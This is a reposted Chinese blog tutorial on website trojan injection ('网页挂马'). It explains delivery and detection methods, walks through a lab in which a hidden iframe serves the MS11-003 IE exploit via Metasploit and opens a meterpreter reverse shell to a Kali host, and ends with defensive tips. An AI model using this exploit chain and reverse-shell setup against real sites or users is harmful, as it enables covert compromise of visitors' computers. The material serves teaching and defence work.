wordpress被挂马_php绕过

wordpress被挂马_php绕过注:本文仅供学习参考网页挂马简介网页挂马指的是把一个木马程序上传到一个网站里面,然后用木马生成器生成一个网马,放到网页空间里面,再加代码使得木马在打开网页时运行。网页挂马工作原理作为网页挂马的散布者,其目的是将木马下载到用户本地并进一步执行,当木马得到执行后,就意味着会有更多的木马被下载,且进一步被执行。这样就进入一个恶性的循环,从而使用户的电脑遭到攻击和控制。为达到目的首先要将木马下载到本地。常…

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE稳定放心使用

注:本文仅供学习参考

网页挂马简介

网页挂马指的是把一个木马程序上传到一个网站里面,然后用木马生成器生成一个网马,放到网页空间里面,再加代码使得木马在打开网页时运行。

网页挂马工作原理

作为网页挂马的散布者,其目的是将木马下载到用户本地并进一步执行,当木马得到执行后,就意味着会有更多的木马被下载,且进一步被执行。这样就进入一个恶性的循环,从而使用户的电脑遭到攻击和控制。为达到目的首先要将木马下载到本地。

常见方式

1将木马伪装为页面元素,木马则会被浏览器自动下载到本地。

2利用脚本运行的漏洞下载木马。

3利用脚本运行的漏洞释放隐含在网页脚本中的木马。

4将木马伪装成缺失的组件,或和缺失的组件捆绑在一起,如flash播放插件。这样既达到了下载的目的,下载的组件又会被浏览器自动执行。

5通过脚本运行调用某些com组件,利用其漏洞下载木马。

6在渲染页面内容的过程中,利用格式溢出释放木马,如ani格式溢出漏洞。

7在渲染页面内容的过程中,利用格式溢出下载木马,如flash9.0.115播放漏洞。

检测方式

1特征匹配:将网页挂马的脚本按脚本病毒进行检测,但是网页脚本变形方式、加密方式比起传统的PE格式病毒更为多样,检测起来也更加困难。

2主动防御:当浏览器要进行某些动作时,作出提示,如下载了某插件的安装包,会提示是否运行。比如浏览器创建暴风影音播放器时,提示是否允许运行,大多数情况下用户会点击是,网页木马会因此得到执行。

3检查父进程是否为浏览器,这种方法很容易被躲过且会对很多插件造成误报。

网站挂马实验

准备win7实验机和kali

kali ip地址为10.1.1.101

1.将以下代码插进我们准备的网站中

将宽度高度都设为0,这个地址就会变成透明,不查看源代码的话是发现不了的

这里的网马地址设置为http://10.1.1.101:8060/test.html当用户访问到我们这个地址时,会自动访问http://10.1.1.101:8060/test.html,木马会被浏览下载到本地

2.利用ms11_003IE漏洞攻击win7主机

执行命令

use exploit/windows/browser/ ms11_003_ie_css_import’,选择漏洞利用EXP

设置SRVPORT URIPATH与网马中的src一致

set SRVPORT 8060

set URIPATH test.html

运行命令set payload windows/meterpreter/reverse_tcp 设置攻击载荷进行回连

set lhost 10.1.1.101 设置回连的IP地址

set lport 1234设置回连端口号

show options

最后设置完看下图

bVbD39Q

执行run命令

好戏上场

这时打开win7实验机,打开IE,模拟受害者访问http://10.1.1.101/index.html

bVbD4ch

在kali端成功看到受害者主机上线

bVbD4ct

成功使用sysinfo查看主机信息

bVbD4cI

使用Screenshot查看win7实验机的屏幕截图(win7待机了)

bVbD4ej

包括后面收集信息属于后渗透环节,本文不做讨论。

防御措施

1对开放上传附件功能的网站,一定要进行身份认证,并只允许信任的人使用上传程序。

2保证所使用的程序及时地更新。

3不要在前台网页加注后台管理程序登录页面的链接。

4时常备份数据库等文件,但是不要把备份数据放在程序默认的备份目录下。

5管理员的用户名和密码要有一定复杂性。

6 IIS中禁止目录的写入和执行功能,可以有效防止asp木马。

7在服务器、虚拟主机控制面板设置执行权限选项中,将有上传权限的目录取消asp的运行权限。

8创建一个robots.txt上传到网站根目录,Robots能够有效防范利用搜索引擎窃取信息的骇客。

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/188870.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长


相关推荐

  • 关于java类加载正确的是_java类什么时候被加载

    关于java类加载正确的是_java类什么时候被加载注意我们当在另一个类中引用其他类的final静态值的时候,编译器把其他类的final符号引用存储在自己类的常量池中了

    2022年8月9日
    1
  • 软件测试常用的黑盒测试方法有哪些,简述什么是黑盒测试方法(最常用的黑盒测试方法)…[通俗易懂]

    软件测试常用的黑盒测试方法有哪些,简述什么是黑盒测试方法(最常用的黑盒测试方法)…[通俗易懂]黑盒(又叫功能测试、数据驱动测试):1.黑盒测试发现错误类型:功能错误和遗漏界面错误数据库错误性能错误初始化和终止错误2.黑盒测试:程序外部接口进行的3.黑盒测试就是根据功能需求来设计测试用例,验证软件是否按照预期要求工作。4.黑盒测试技术主要有等价类划分法、边界值法、判定表法、因果图法、场景法等。5.等价类划分法测试技术是依据软件系统输入集合、输出集合或操作集合实现功能的相同性为依据,对其进行的…

    2022年9月27日
    0
  • USB转232和485的区别

    1串口串口,即串行通信接口,与之相对应的另一种接口叫并口,并行接口。两者的区别是,传输一个字节(8个位)的数据时,串口是将8个位排好队,逐个地在1条连接线上传输,而并口则将8个位一字排开,分别在8条连接线上同时传输,也就是进行数据传输的接口串口是一种物理接口形式,(硬件)通常指COM接口,当然这些接口有着很多标准接口标准:串口通信的接口标准有很多,而我们所了解的RS-23…

    2022年4月7日
    78
  • dpois函数_frequency函数

    dpois函数_frequency函数https://r4ds.had.co.nz/transform.htmlgroupedsummarieswithsummarise5.6通过进行分组概括将数据框折叠为单行:除非我们

    2022年8月5日
    3
  • 大疆网上测评题库_【大疆在线测试有几套题啊?】-看准网

    大疆网上测评题库_【大疆在线测试有几套题啊?】-看准网写面经,攒人品。大疆服务运营培训生。1.大疆网上笔试题(比较独创,很有趣,也有歇跟大疆相关的题,要比较熟悉大疆),笔试过后,有岗位笔试作业。2.大疆服务运营培训生笔试作业题目。三道大题,开放性题目,专业和岗位相关,涉及报告类题目。规定期限内提交,审核,通过后进入面试环节。3.一面,微信视频面试。提前约定时间,到点准时打来,直奔主题。自我介绍,针对个人经历开始提问,最后会用英文简单问答一下看英语能力…

    2022年6月18日
    62
  • mac os x安装教程_OS X EI Capitan

    mac os x安装教程_OS X EI Capitan【引用】Mac下面除了用dmg、pkg来安装软件外,比较方便的还有用MacPorts来帮助你安装其他应用程序,跟BSD中的ports道理一样。MacPorts就像apt-get、yum一样,可以快速安装些软件。下面将MacPorts的安装和使用方法记录在这里以备查。访问官方网站http://www.macports.org/install.php,这里提供有dmg安装和源码安装两种方式,d

    2022年9月16日
    0

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号